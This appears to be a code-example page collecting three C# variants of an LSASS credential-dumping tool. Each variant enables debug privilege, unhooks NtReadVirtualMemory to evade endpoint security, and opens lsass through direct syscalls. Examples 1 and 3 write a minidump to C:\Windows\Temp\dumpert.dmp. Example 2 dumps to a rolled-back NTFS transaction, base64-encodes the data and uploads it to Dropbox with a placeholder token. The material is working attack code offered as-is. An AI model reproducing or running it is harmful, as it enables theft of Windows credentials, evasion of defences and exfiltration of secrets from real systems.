예제 #1
0
        public static void Execute(string[] args)
        {
            if (IntPtr.Size != 8)
            {
                return;
            }

            if (!IsElevated())
            {
                Console.WriteLine("Run in High integrity context");
                return;
            }

            SetDebugPrivilege();

            Natives.WIN_VER_INFO pWinVerInfo = new Natives.WIN_VER_INFO();

            Natives.OSVERSIONINFOEXW osInfo = new Natives.OSVERSIONINFOEXW();
            osInfo.dwOSVersionInfoSize = Marshal.SizeOf(osInfo);

            Natives.RtlGetVersion(ref osInfo);

            pWinVerInfo.chOSMajorMinor = osInfo.dwMajorVersion + "." + osInfo.dwMinorVersion;

            Console.WriteLine("[*] OS MajorMinor version : " + pWinVerInfo.chOSMajorMinor);
            if (!pWinVerInfo.chOSMajorMinor.Equals("10.0"))
            {
                Console.WriteLine("[x] Windows 10 - Windows Server 2016 only");
                return;
            }

            pWinVerInfo.SystemCall = 0x3F;

            Natives.RtlInitUnicodeString(ref pWinVerInfo.ProcName, @"lsass.exe");
            pWinVerInfo.hTargetPID = (IntPtr)Process.GetProcessesByName("lsass")[0].Id;

            pWinVerInfo.lpApiCall = "NtReadVirtualMemory";

            if (!UnHookNativeApi(pWinVerInfo))
            {
                Console.WriteLine("[x] error unhooking {0}", pWinVerInfo.lpApiCall);
                return;
            }

            Natives.CLIENT_ID clientid = new Natives.CLIENT_ID();
            clientid.UniqueProcess = pWinVerInfo.hTargetPID;
            clientid.UniqueThread  = IntPtr.Zero;

            IntPtr hProcess = IntPtr.Zero;

            Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES();


            var status = NativeSysCall.ZwOpenProcess10(ref hProcess, Natives.ProcessAccessFlags.All, objAttribute, ref clientid);

            if (hProcess == IntPtr.Zero)
            {
                Console.WriteLine("[x] Error ZwOpenProcess10  " + status);
                return;
            }

            Console.WriteLine("[*] ZwOpenProcess10  " + status);

            Natives.PSS_CAPTURE_FLAGS flags = Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_VA_CLONE
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLES
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_NAME_INFORMATION
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_BASIC_INFORMATION
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_TRACE
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREADS
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREAD_CONTEXT
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREAD_CONTEXT_EXTENDED
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_BREAKAWAY
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_BREAKAWAY_OPTIONAL
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_USE_VM_ALLOCATIONS
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_RELEASE_SECTION;

            IntPtr SnapshotHandle = IntPtr.Zero;
            int    pss            = Natives.PssCaptureSnapshot(hProcess, flags, 1048607, ref SnapshotHandle);

            Console.WriteLine("[*] PssCaptureSnapshot " + pss);
            if (SnapshotHandle == IntPtr.Zero)
            {
                Console.WriteLine("[x] Error PssCaptureSnapshot  ");
                return;
            }

            Natives.UNICODE_STRING uFileName = new Natives.UNICODE_STRING();
            Natives.RtlInitUnicodeString(ref uFileName, @"\??\C:\Windows\Temp\dumpert.dmp");

            Microsoft.Win32.SafeHandles.SafeFileHandle hDmpFile;
            IntPtr hElm = IntPtr.Zero;

            Natives.IO_STATUS_BLOCK IoStatusBlock = new Natives.IO_STATUS_BLOCK();

            IntPtr objectName = Marshal.AllocHGlobal(Marshal.SizeOf(uFileName));

            Marshal.StructureToPtr(uFileName, objectName, true);

            Natives.OBJECT_ATTRIBUTES FileObjectAttributes = new Natives.OBJECT_ATTRIBUTES
            {
                ObjectName               = objectName,
                Attributes               = 0x00000040,
                Length                   = (ulong)Marshal.SizeOf(typeof(Natives.OBJECT_ATTRIBUTES)),
                RootDirectory            = IntPtr.Zero,
                SecurityDescriptor       = IntPtr.Zero,
                SecurityQualityOfService = IntPtr.Zero
            };

            Natives.LARGE_INTEGER lint = new Natives.LARGE_INTEGER();
            lint.HighPart = 0;
            lint.LowPart  = 0;

            long allocationsize = 0;

            status = NativeSysCall.NtCreateFile10(
                out hDmpFile,
                (int)Natives.FILE_GENERIC_WRITE,
                ref FileObjectAttributes,
                out IoStatusBlock,
                ref allocationsize,
                Natives.FILE_ATTRIBUTE_NORMAL,
                System.IO.FileShare.Write,
                Natives.FILE_OVERWRITE_IF,
                Natives.FILE_SYNCHRONOUS_IO_NONALERT,
                hElm, 0);

            if (hDmpFile.IsInvalid)
            {
                Console.WriteLine("[x] Error NtCreateFile10  " + status + " " + IoStatusBlock.status);
                NativeSysCall.ZwClose10(hProcess);
                return;
            }


            Natives.MINIDUMP_CALLBACK_INFORMATION CallbackInfo = new Natives.MINIDUMP_CALLBACK_INFORMATION();
            CallbackInfo.CallbackRoutine = Program.MyMiniDumpWriteDumpCallback;
            CallbackInfo.CallbackParam   = IntPtr.Zero;

            IntPtr pCallbackInfo = Marshal.AllocHGlobal(Marshal.SizeOf(CallbackInfo));

            Marshal.StructureToPtr(CallbackInfo, pCallbackInfo, false);

            IntPtr ExceptionParam  = IntPtr.Zero;
            IntPtr UserStreamParam = IntPtr.Zero;
            IntPtr CallbackParam   = IntPtr.Zero;

            Console.WriteLine("[*] Target PID " + pWinVerInfo.hTargetPID);
            Console.WriteLine("[*] Generating minidump.... " + pWinVerInfo.hTargetPID);

            if (!Natives.MiniDumpWriteDump(SnapshotHandle, (uint)pWinVerInfo.hTargetPID, hDmpFile, 2, ExceptionParam, UserStreamParam, pCallbackInfo))
            {
                Console.WriteLine("[x] Error MiniDumpWriteDump  ");
                NativeSysCall.ZwClose10(hProcess);
                return;
            }

            hDmpFile.Dispose();
            NativeSysCall.ZwClose10(hProcess);

            Console.WriteLine("[*] End ");
            Console.WriteLine("[*] Minidump generated in  " + Marshal.PtrToStringUni(uFileName.Buffer).Substring(4));
        }
예제 #2
0
        public unsafe static void Execute(string[] args)
        {
            if (IntPtr.Size != 8)
            {
                return;
            }

            if (!IsElevated())
            {
                Console.WriteLine("Run in High integrity context");
                return;
            }

            SetDebugPrivilege();

            Natives.WIN_VER_INFO pWinVerInfo = new Natives.WIN_VER_INFO();

            Natives.OSVERSIONINFOEXW osInfo = new Natives.OSVERSIONINFOEXW();
            osInfo.dwOSVersionInfoSize = Marshal.SizeOf(osInfo);

            Natives.RtlGetVersion(ref osInfo);

            pWinVerInfo.chOSMajorMinor = osInfo.dwMajorVersion + "." + osInfo.dwMinorVersion;

            Console.WriteLine("[*] OS MajorMinor version : " + pWinVerInfo.chOSMajorMinor);
            if (!pWinVerInfo.chOSMajorMinor.Equals("10.0"))
            {
                Console.WriteLine("[x] Windows 10 - Windows Server 2016 only");
                return;
            }

            pWinVerInfo.SystemCall = 0x3F;

            Natives.RtlInitUnicodeString(ref pWinVerInfo.ProcName, @"lsass.exe");
            pWinVerInfo.hTargetPID = (IntPtr)Process.GetProcessesByName("lsass")[0].Id;

            pWinVerInfo.lpApiCall = "NtReadVirtualMemory";

            if (!UnHookNativeApi(pWinVerInfo))
            {
                Console.WriteLine("[x] error unhooking {0}", pWinVerInfo.lpApiCall);
                return;
            }

            Natives.CLIENT_ID clientid = new Natives.CLIENT_ID();
            clientid.UniqueProcess = pWinVerInfo.hTargetPID;
            clientid.UniqueThread  = IntPtr.Zero;

            IntPtr hProcess = IntPtr.Zero;

            Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES();


            var status = NativeSysCall.ZwOpenProcess10(ref hProcess, Natives.ProcessAccessFlags.All, objAttribute, ref clientid);

            if (hProcess == IntPtr.Zero)
            {
                Console.WriteLine("[x] Error ZwOpenProcess10  " + status);
                return;
            }

            Console.WriteLine("[*] ZwOpenProcess10: " + status);

            Natives.PSS_CAPTURE_FLAGS flags = Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_VA_CLONE
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLES
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_NAME_INFORMATION
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_BASIC_INFORMATION
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_HANDLE_TRACE
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREADS
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREAD_CONTEXT
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CAPTURE_THREAD_CONTEXT_EXTENDED
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_BREAKAWAY
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_BREAKAWAY_OPTIONAL
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_USE_VM_ALLOCATIONS
                                              | Natives.PSS_CAPTURE_FLAGS.PSS_CREATE_RELEASE_SECTION;

            IntPtr SnapshotHandle = IntPtr.Zero;
            int    pss            = Natives.PssCaptureSnapshot(hProcess, flags, 1048607, ref SnapshotHandle);

            Console.WriteLine("[*] PssCaptureSnapshot " + pss);
            if (SnapshotHandle == IntPtr.Zero)
            {
                Console.WriteLine("[x] Error PssCaptureSnapshot  ");
                return;
            }

            IntPtr tHandle = IntPtr.Zero;

            status = NativeSysCall.NtCreateTransaction10(out tHandle, Natives.MAXIMUM_ALLOWED, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, 0, 0, 0, IntPtr.Zero, IntPtr.Zero);
            Console.WriteLine("[*] Transaction: " + status);

            bool success = RtlSetCurrentTransaction(tHandle);

            Natives.UNICODE_STRING uFileName = new Natives.UNICODE_STRING();
            Natives.RtlInitUnicodeString(ref uFileName, @"\??\C:\Windows\Temp\dumpert.dmp");

            IntPtr hDmpFile;
            IntPtr hElm = IntPtr.Zero;

            Natives.IO_STATUS_BLOCK IoStatusBlock = new Natives.IO_STATUS_BLOCK();

            IntPtr objectName = Marshal.AllocHGlobal(Marshal.SizeOf(uFileName));

            Marshal.StructureToPtr(uFileName, objectName, true);

            Natives.OBJECT_ATTRIBUTES FileObjectAttributes = new Natives.OBJECT_ATTRIBUTES
            {
                ObjectName               = objectName,
                Attributes               = 0x00000040,
                Length                   = (ulong)Marshal.SizeOf(typeof(Natives.OBJECT_ATTRIBUTES)),
                RootDirectory            = IntPtr.Zero,
                SecurityDescriptor       = IntPtr.Zero,
                SecurityQualityOfService = IntPtr.Zero
            };

            Natives.LARGE_INTEGER lint = new Natives.LARGE_INTEGER();
            lint.HighPart = 0;
            lint.LowPart  = 0;

            long allocationsize = 0;

            const long READWRITE = Natives.FILE_GENERIC_READ | Natives.FILE_GENERIC_WRITE;

            status = NativeSysCall.NtCreateFile10(
                out hDmpFile,
                (int)READWRITE,
                ref FileObjectAttributes,
                out IoStatusBlock,
                ref allocationsize,
                Natives.FILE_ATTRIBUTE_NORMAL,
                System.IO.FileShare.Write,
                Natives.FILE_OVERWRITE_IF,
                Natives.FILE_SYNCHRONOUS_IO_NONALERT,
                hElm, 0);

            success = RtlSetCurrentTransaction(IntPtr.Zero);

            Natives.MINIDUMP_CALLBACK_INFORMATION CallbackInfo = new Natives.MINIDUMP_CALLBACK_INFORMATION();
            CallbackInfo.CallbackRoutine = Program.MyMiniDumpWriteDumpCallback;
            CallbackInfo.CallbackParam   = IntPtr.Zero;

            IntPtr pCallbackInfo = Marshal.AllocHGlobal(Marshal.SizeOf(CallbackInfo));

            Marshal.StructureToPtr(CallbackInfo, pCallbackInfo, false);

            IntPtr ExceptionParam  = IntPtr.Zero;
            IntPtr UserStreamParam = IntPtr.Zero;
            IntPtr CallbackParam   = IntPtr.Zero;

            Console.WriteLine("[*] Target PID " + pWinVerInfo.hTargetPID);
            Console.WriteLine("[*] Generating minidump.... ");

            if (!Natives.MiniDumpWriteDump(SnapshotHandle, (uint)pWinVerInfo.hTargetPID, hDmpFile, 2, ExceptionParam, UserStreamParam, pCallbackInfo))
            {
                Console.WriteLine("[x] Error MiniDumpWriteDump  ");
                NativeSysCall.ZwClose10(hProcess);
                return;
            }

            int size = GetFileSize(hDmpFile, IntPtr.Zero);

            IntPtr hMapping = CreateFileMapping(hDmpFile, 0, (uint)Natives.PROTECT.PAGE_READONLY, 0, 0, "");

            IntPtr data = MapViewOfFile(hMapping, Natives.FILE_MAP_READ, 0, 0, 0);

            Console.WriteLine("[*] Data: 0x" + Convert.ToString((long)data, 16));

            byte[] data_ = new byte[size];
            Marshal.Copy(data, data_, 0, size);

            string b64 = Convert.ToBase64String(data_);

            Console.WriteLine("[*] Sending " + b64.Length / (1024 * 1024) + " megabytes of data...");

            SslTcpClient.RunClient("content.dropboxapi.com", "<FOLDER>", "<DROPBOX TOKEN>", b64);

            int stat = NtRollbackTransaction(tHandle, false);

            NativeSysCall.ZwClose10(hDmpFile);
            NativeSysCall.ZwClose10(hProcess);
            NativeSysCall.ZwClose10(tHandle);

            Console.WriteLine("[*] Done! ");
        }
예제 #3
0
        static void Main(string[] args)
        {
            if (IntPtr.Size != 8)
            {
                return;
            }

            if (!IsElevated())
            {
                Console.WriteLine("Run in High integrity context");
                return;
            }

            SetDebugPrivilege();

            Natives.WIN_VER_INFO pWinVerInfo = new Natives.WIN_VER_INFO();

            Natives.OSVERSIONINFOEXW osInfo = new Natives.OSVERSIONINFOEXW();
            osInfo.dwOSVersionInfoSize = Marshal.SizeOf(osInfo);

            //I know, this is not realy needed but today I have fun on run stuff dynamically :D
            IntPtr ntdll = Natives.LoadLibraryA("ntdll.dll");
            IntPtr proc  = Natives.GetProcAddress(ntdll, "RtlGetVersion");

            NativeSysCall.Delegates.RtlGetVersion RtlGetVersion = (NativeSysCall.Delegates.RtlGetVersion)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.RtlGetVersion));

            RtlGetVersion(ref osInfo);

            pWinVerInfo.chOSMajorMinor = osInfo.dwMajorVersion + "." + osInfo.dwMinorVersion;

            Console.WriteLine("[*] OS MajorMinor version : " + pWinVerInfo.chOSMajorMinor);
            if (!pWinVerInfo.chOSMajorMinor.Equals("10.0"))
            {
                Console.WriteLine("[x] Windows 10 - Windows Server 2016 only");
                return;
            }

            pWinVerInfo.SystemCall = 0x3F;

            proc = Natives.GetProcAddress(ntdll, "RtlInitUnicodeString");

            NativeSysCall.Delegates.RtlInitUnicodeString RtlInitUnicodeString = (NativeSysCall.Delegates.RtlInitUnicodeString)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.RtlInitUnicodeString));
            RtlInitUnicodeString(ref pWinVerInfo.ProcName, @"lsass.exe");
            pWinVerInfo.hTargetPID = (IntPtr)Process.GetProcessesByName("lsass")[0].Id;

            pWinVerInfo.lpApiCall = "NtReadVirtualMemory";

            if (!UnHookNativeApi(pWinVerInfo))
            {
                Console.WriteLine("[x] error unhooking {0}", pWinVerInfo.lpApiCall);
                return;
            }

            Natives.CLIENT_ID clientid = new Natives.CLIENT_ID();
            clientid.UniqueProcess = pWinVerInfo.hTargetPID;
            clientid.UniqueThread  = IntPtr.Zero;

            IntPtr hProcess = IntPtr.Zero;

            Natives.OBJECT_ATTRIBUTES objAttribute = new Natives.OBJECT_ATTRIBUTES();
            // objAttribute.ObjectName = null;

            var status = NativeSysCall.ZwOpenProcess10(ref hProcess, Natives.ProcessAccessFlags.All, objAttribute, ref clientid);

            if (hProcess == IntPtr.Zero)
            {
                Console.WriteLine("[x] Error ZwOpenProcess10  " + status);
                return;
            }

            Natives.UNICODE_STRING uFileName = new Natives.UNICODE_STRING();
            RtlInitUnicodeString(ref uFileName, @"\??\C:\Windows\Temp\dumpert.dmp");

            Microsoft.Win32.SafeHandles.SafeFileHandle hDmpFile;
            IntPtr hElm = IntPtr.Zero;

            Natives.IO_STATUS_BLOCK IoStatusBlock = new Natives.IO_STATUS_BLOCK();

            IntPtr objectName = Marshal.AllocHGlobal(Marshal.SizeOf(uFileName));

            Marshal.StructureToPtr(uFileName, objectName, true);

            Natives.OBJECT_ATTRIBUTES FileObjectAttributes = new Natives.OBJECT_ATTRIBUTES
            {
                ObjectName               = objectName,
                Attributes               = 0x00000040,
                Length                   = (ulong)Marshal.SizeOf(typeof(Natives.OBJECT_ATTRIBUTES)),
                RootDirectory            = IntPtr.Zero,
                SecurityDescriptor       = IntPtr.Zero,
                SecurityQualityOfService = IntPtr.Zero
            };

            Natives.LARGE_INTEGER lint = new Natives.LARGE_INTEGER();
            lint.HighPart = 0;
            lint.LowPart  = 0;

            long allocationsize = 0;

            status = NativeSysCall.NtCreateFile10(
                out hDmpFile,
                (int)Natives.FILE_GENERIC_WRITE,
                ref FileObjectAttributes,
                out IoStatusBlock,
                ref allocationsize,
                Natives.FILE_ATTRIBUTE_NORMAL,
                System.IO.FileShare.Write,
                Natives.FILE_OVERWRITE_IF,
                Natives.FILE_SYNCHRONOUS_IO_NONALERT,
                hElm, 0);

            if (hDmpFile.IsInvalid)
            {
                Console.WriteLine("[x] Error NtCreateFile10  " + status + " " + IoStatusBlock.status);
                NativeSysCall.ZwClose10(hProcess);
                return;
            }

            IntPtr Dbghelp = Natives.LoadLibraryA("Dbghelp.dll");

            proc = Natives.GetProcAddress(Dbghelp, "MiniDumpWriteDump");

            NativeSysCall.Delegates.MiniDumpWriteDump MiniDumpWriteDump = (NativeSysCall.Delegates.MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(proc, typeof(NativeSysCall.Delegates.MiniDumpWriteDump));

            IntPtr ExceptionParam  = IntPtr.Zero;
            IntPtr UserStreamParam = IntPtr.Zero;
            IntPtr CallbackParam   = IntPtr.Zero;

            Console.WriteLine("[*] Target PID " + pWinVerInfo.hTargetPID);
            Console.WriteLine("[*] Generating minidump.... " + pWinVerInfo.hTargetPID);

            if (!MiniDumpWriteDump(hProcess, (uint)pWinVerInfo.hTargetPID, hDmpFile, 2, ExceptionParam, UserStreamParam, CallbackParam))
            {
                Console.WriteLine("[x] Error MiniDumpWriteDump  ");
                NativeSysCall.ZwClose10(hProcess);
                return;
            }

            hDmpFile.Dispose();
            NativeSysCall.ZwClose10(hProcess);

            Console.WriteLine("[*] End ");
            Console.WriteLine("[*] Minidump generated in  " + Marshal.PtrToStringUni(uFileName.Buffer).Substring(4));
        }